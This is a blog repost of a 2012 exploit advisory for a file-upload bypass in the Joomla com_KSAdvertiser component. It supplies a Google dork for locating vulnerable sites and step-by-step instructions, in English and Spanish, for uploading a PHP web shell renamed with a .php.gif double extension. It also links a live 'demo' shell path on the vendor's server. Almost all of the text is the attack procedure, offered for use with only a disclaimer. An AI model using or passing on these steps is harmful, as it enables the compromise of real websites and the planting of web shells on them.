Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability | BOT24

Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability


############################################################################
# 
# Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability 
#
# Google Dork: inurl:index.php?option=com_ksadvertiser
#
# Date: [12-07-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://www.insecurityperu.org/
#
# vendor Link: http://www.kiss-software.de
# 
# Tested on: [Linux(arch)-Windows(7ultimate)]
#

1.  Some pages require the Register
    Registrese Algunas Paginas lo exigen
   
   http://site/index.php?option=com_user&view=login


2.  Go to the upload path
    Dirijase a la ruta del upload 

   
   http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en


3.  Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif
    Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif 

4.  Locate your file in the root / images/ksadvertiser/U0 -> this may vary
    Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar
 
    http://site/images/ksadvertiser/U0/403.php.gif


                    Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
 
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"


The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Bot24, Inc nor Bradley Sean Susser accepts no responsibility for any damage
caused by the use or misuse of this information.


Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment